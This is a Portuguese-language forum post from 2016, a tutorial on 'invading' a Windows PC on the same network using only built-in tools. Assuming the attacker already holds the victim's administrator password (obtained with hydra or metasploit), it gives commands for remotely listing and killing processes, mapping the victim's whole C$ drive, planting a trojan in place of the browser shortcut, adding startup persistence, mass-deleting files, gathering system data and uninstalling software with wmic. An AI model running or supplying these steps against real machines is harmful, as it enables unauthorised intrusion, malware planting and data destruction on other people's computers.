NeverW Games

Tutorias Em Geral.


    Invadir/Hackear computador/ pelo CMD, MMC, etc..

    Compartilhe
    avatar
    C0D3R-X
    Noob
    Noob

    Mensagens : 12
    Data de inscrição : 12/01/2016

    Invadir/Hackear computador/ pelo CMD, MMC, etc..

    Mensagem por C0D3R-X em Qua Jan 13, 2016 5:13 pm

    Quando digo sem programas, é algo meio figurado, o que quero dizer realmente é que não será usado nenhum programa além dos que já vem no Windows, ou seja, CMD e tals.. (SIM, CMD é um programa '-' ) bounce



    Bom, a parte chata é que esse tutorial tem alguns requisitos



    • Ter o usuário e senha do administrador do computador remoto(isso existem várias formas de conseguir, tanto local quanto remotamente, remoto existem programas como hydra, módulos do metasploit e até mesmo um script que eu criei [Você precisa estar registrado e conectado para ver este link.])
    • O firewall do computador remoto deve estar inativo
    • de preferência ter o RDP/area de trabalho remota ativo no computador remoto
    • Isso se aplica a apenas quando o computador esta na mesma rede ou na DMZ de outra rede



    Por que tudo isso?

    Simples, o windows não vem com ferramentas pra hacking, isso é apenas uma adaptação das ferramentas nativas do windows e que de fato vou me limitar somente ao que vem no windows, mas pra quem quiser potencializar o ataque, sugiro dar uma olhada no [Você precisa estar registrado e conectado para ver este link.], uma suite de ferramentas da própria microsoft pra um gerenciamento mais avançado do computador, onde vc pode manipular tanto um computador local quanto remoto em questões como o que inicia com o sistema, usuários, gerenciar processos, etc..

    Pulando então os requisitos vamos la

    ~le PC atacante IP = 192.168.254.10

    ~le PC alvo IP = 192.168.254.88



    Listando e finalizando processos do computador Invadido

    Algo que pode ser útil é poder gerenciar processos do computador remoto, ou seja, listar, finalizar e criar processos, no nosso, caso podemos apenas listar e finalizar

    Pra Listar existe o comando tasklist que permite ver os processos ativos com ou sem detalhes, depende das flags que vc passar pro comando..



    no caso vou apenas usar a opção /s /u e /p que basicamente serve pra executar o tasklist no computador remoto

    * se vc informar o /s, mas não o /u e /p, quando ele se conectar, vai pedir o login e senha do mesmo jeito

    então o comando seria basicamente este



    tasklist /s /u /p


    No meu caso



    tasklist /s 192.168.254.88 /u administrador /p 12345
    [Você precisa estar registrado e conectado para ver esta imagem.]



    ou



    tasklist /s 192.168.254.88 /u administrador /p 12345
    onde a opção /v vai listar mais detalhes sobre os processos

    [Você precisa estar registrado e conectado para ver esta imagem.]



    e pra concluir vamos finalizar o processo que eu marquei em vermelho

    pra isso existe outro comando, o tasklist ele permite finalizar processos no computador local e remoto, ele funciona semelhante ao tasklist, bastando passar tasklist /s e o nome do computador alvo

    aqui vou finalizar usando o PID, então:



    taskkill /s /PID /u /p


    No meu caso



    taskkill /s 192.168.254.8 /PID 3720 /u administrador /p 12345


    e é isso ai

    [Você precisa estar registrado e conectado para ver esta imagem.]





    Acessando os arquivos do computador invadido



    Aqui a coisa começa a ficar mais interessante, pois podemos baixar/enviar/editar arquivos, pra isso vamos simplesmente fazer com que o HD dele, seja um mapeamento de rede

    Nessa parte um bom comando é o net use, como quero mapear a unidade inteira do cara, uso +$





    net use /user:




    No meu caso





    net use X: \\192.168.254.88\C$ /user:administrador 12345


    Depois disso, no computador do atacante, será criada uma unidade X que é a unidade mapeada do computador alvo





    [Você precisa estar registrado e conectado para ver esta imagem.]





    [Você precisa estar registrado e conectado para ver esta imagem.]



    Como o usuário logado é o administrador, vc tem acesso a todas as pastas e a partir daqui vc pode usar a imaginação, plantando algum outro vírus no computador do cara, como por exemplo, substituir o atalho do navegador, por um trojan e tals..



    outra coisa interessante é você por arquivos para iniciar com o sistema, pra isso basta mover o arquivo/atalho do arquivo pra pasta startup do windows, que no windows 7 é :




    C:\Users\\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup




    Deletando arquivos em massa do computador remoto



    Isso ja é mais cara de BR, invadir pra apagar tudo kk, bom aqui vc pode acessar graficamente a unidade la que vc mapeou e apagar o que quiser, mas se vc quiser, pode fazer pelo cmd tbm, usando aqueles velhos comandos de del e tals...

    No meu caso vou excluir todos os arquivos .tmp da unidade C:\ do computador invadido, que agora é a unidade X do meu PC



    * vou excluir os arquivos temporário, mas obviamente ai vc pode excluir o que quiser, ou melhor, o que seu usuário tiver permissão pra excluir



    Então aqui usei o comando





    del /s /f /q X:\*.tmp




    ou seja, excluir de forma silenciosa, recursiva e forçada todos arquivos .tmp da unidade X

    [Você precisa estar registrado e conectado para ver esta imagem.]





    Obtendo informações sobre o sistema operacional do computador



    Algo que dependendo da situação pode ser útil, é obter dados do sistema, como quando o sistema foi instalado, quais patchs de segurança estão instalados e até mesmo desde quando o computador esta ligado..

    Pra isso podemos usar o comando systeminfo



    a sintaxe lembra o tasklist, pois pasta vc passar a opção /s e o computador alvo





    systeminfo /s /u /p




    No meu caso





    systeminfo /s 192.168.254.88 /u administrador /p 12345


    #ignorem o | more no print, isso é só pra exibir a saída do comando de forma mais "calma", sem sair aquele monte de informação de uma vez, a informação vai sendo exibida conforme vc tecla enter



    [Você precisa estar registrado e conectado para ver esta imagem.]





    Listar/Remover programas instalados no computador remoto



    Aqui ja vamos começar a brincar além do CMD, usando [Você precisa estar registrado e conectado para ver este link.], que pode-se dizer que ele e o [Você precisa estar registrado e conectado para ver este link.], é a versão adulta do CMD kk



    pra começar, vamos listar os programas instalados no computador



    /user: /password: /node: product get name,version,vendor,identifyingNumber



    no caso essas opções de name, version, etc.. são mais pra detalhar as informações, se vc passar só o name, já vai retornar o nome dos programas



    No meu caso usei :



    /user:administrador /password:12345 /node:192.168.254.88 product get name,version,vendor,identifyingNumber



    [Você precisa estar registrado e conectado para ver esta imagem.]









    Então temos ai a lista de programas instalados, mas de fato, o wmic nunca me retornou a lista completa de programas instalados, alguns realmente ele não mostra, não sei porque..

    Continuando, vamos remover o java



    pra isso mudamos apenas do product pra frente..




    /user: /password: /node: product where name="" call uninstall




    No meu caso




    /user:administrador /password:12345 /node:192.168.254.88 product where name="Java 8 Update 45" call uninstall


    [Você precisa estar registrado e conectado para ver esta imagem.]





    #um detalhe, na frente do comando pra remover o programa vc pode por /nointeractive pra não exibir uma mensagem na tela (na sua tela e não na tela do computador remoto) perguntando se vc quer continuar ou não, ele remove direto



    Enfim cara, com WMI vc faz mta coisa, vc pode gerenciar varias coisas, vale a pena dar uma estudada



    aqui um help do programa




    wmic:root\cli>/?

    [global switches]

    The following global switches are available:
    /NAMESPACE Path for the namespace the alias operate against.
    /ROLE Path for the role containing the alias definitions.
    /NODE Servers the alias will operate against.
    /IMPLEVEL Client impersonation level.
    /AUTHLEVEL Client authentication level.
    /LOCALE Language id the client should use.
    /PRIVILEGES Enable or disable all privileges.
    /TRACE Outputs debugging information to stderr.
    /RECORD Logs all input commands and output.
    /INTERACTIVE Sets or resets the interactive mode.
    /FAILFAST Sets or resets the FailFast mode.
    /USER User to be used during the session.
    /PASSWORD Password to be used for session login.
    /OUTPUT Specifies the mode for output redirection.
    /APPEND Specifies the mode for output redirection.
    /AGGREGATE Sets or resets aggregate mode.
    /AUTHORITY Specifies the for the connection.
    /?[:] Usage information.

    For more information on a specific global switch, type: switch-name /?


    The following alias/es are available in the current role:
    ALIAS - Access to the aliases available on the local system
    BASEBOARD - Base board (also known as a motherboard or system board) management.
    BIOS - Basic input/output services (BIOS) management.
    BOOTCONFIG - Boot configuration management.
    CDROM - CD-ROM management.
    COMPUTERSYSTEM - Computer system management.
    CPU - CPU management.
    CSPRODUCT - Computer system product information from SMBIOS.
    DATAFILE - DataFile Management.
    DCOMAPP - DCOM Application management.
    DESKTOP - User's Desktop management.
    DESKTOPMONITOR - Desktop Monitor management.
    DEVICEMEMORYADDRESS - Device memory addresses management.
    DISKDRIVE - Physical disk drive management.
    DISKQUOTA - Disk space usage for NTFS volumes.
    DMACHANNEL - Direct memory access (DMA) channel management.
    ENVIRONMENT - System environment settings management.
    FSDIR - Filesystem directory entry management.
    GROUP - Group account management.
    IDECONTROLLER - IDE Controller management.
    IRQ - Interrupt request line (IRQ) management.
    JOB - Provides access to the jobs scheduled using the schedule service.
    LOADORDER - Management of system services that define execution dependencies.
    LOGICALDISK - Local storage device management.
    LOGON - LOGON Sessions.
    MEMCACHE - Cache memory management.
    MEMORYCHIP - Memory chip information.
    MEMPHYSICAL - Computer system's physical memory management.
    NETCLIENT - Network Client management.
    NETLOGIN - Network login information (of a particular user) management.
    NETPROTOCOL - Protocols (and their network characteristics) management.
    NETUSE - Active network connection management.
    NIC - Network Interface Controller (NIC) management.
    NICCONFIG - Network adapter management.
    NTDOMAIN - NT Domain management.
    NTEVENT - Entries in the NT Event Log.
    NTEVENTLOG - NT eventlog file management.
    ONBOARDDEVICE - Management of common adapter devices built into the motherboard (system board).
    OS - Installed Operating System/s management.
    PAGEFILE - Virtual memory file swapping management.
    PAGEFILESET - Page file settings management.
    PARTITION - Management of partitioned areas of a physical disk.
    PORT - I/O port management.
    PORTCONNECTOR - Physical connection ports management.
    PRINTER - Printer device management.
    PRINTERCONFIG - Printer device configuration management.
    PRINTJOB - Print job management.
    PROCESS - Process management.
    PRODUCT - Installation package task management.
    QFE - Quick Fix Engineering.
    QUOTASETTING - Setting information for disk quotas on a volume.
    RDACCOUNT - Remote Desktop connection permission management.
    RDNIC - Remote Desktop connection management on a specific network adapter.
    RDPERMISSIONS - Permissions to a specific Remote Desktop connection.
    RDTOGGLE - Turning Remote Desktop listener on or off remotely.
    RECOVEROS - Information that will be gathered from memory when the operating system fails.
    REGISTRY - Computer system registry management.
    SCSICONTROLLER - SCSI Controller management.
    SERVER - Server information management.
    SERVICE - Service application management.
    SHADOWCOPY - Shadow copy management.
    SHADOWSTORAGE - Shadow copy storage area management.
    SHARE - Shared resource management.
    SOFTWAREELEMENT - Management of the elements of a software product installed on a system.
    SOFTWAREFEATURE - Management of software product subsets of SoftwareElement.
    SOUNDDEV - Sound Device management.
    STARTUP - Management of commands that run automatically when users log onto the computer system.
    SYSACCOUNT - System account management.
    SYSDRIVER - Management of the system driver for a base service.
    SYSTEMENCLOSURE - Physical system enclosure management.
    SYSTEMSLOT - Management of physical connection points including ports, slots and peripherals, and proprietary connections points.
    TAPEDRIVE - Tape drive management.
    TEMPERATURE - Data management of a temperature sensor (electronic thermometer).
    TIMEZONE - Time zone data management.
    UPS - Uninterruptible power supply (UPS) management.
    USERACCOUNT - User account management.
    VOLTAGE - Voltage sensor (electronic voltmeter) data management.
    VOLUME - Local storage volume management.
    VOLUMEQUOTASETTING - Associates the disk quota setting with a specific disk volume.
    VOLUMEUSERQUOTA - Per user storage volume quota management.
    WMISET - WMI service operational parameters management.

    For more information on a specific alias, type: alias /?

    CLASS - Escapes to full WMI schema.
    PATH - Escapes to full WMI object paths.
    CONTEXT - Displays the state of all the global switches.
    QUIT/EXIT - Exits the program.

    For more information on CLASS/PATH/CONTEXT, type: (CLASS | PATH | CONTEXT) /?

    wmic:root\cli>



    e dois links bons sobre wmi

    [Você precisa estar registrado e conectado para ver este link.]

    [Você precisa estar registrado e conectado para ver este link.]





    Enfim, não é tão pratico como alguns tipos de invasão, não tem mto point-click nessa parte, nem recursos mto avançados, mas a ideia é demonstrar que hacker não é feito de ferramentas hacker, é feito de conhecimento, conhecimento que lhe permite usar tudo a sua volta como algo que possa vir a ser útil na sua tarefa..

    em outras palavras...

    [Você precisa estar registrado e conectado para ver esta imagem.]

      Data/hora atual: Ter Out 17, 2017 7:55 am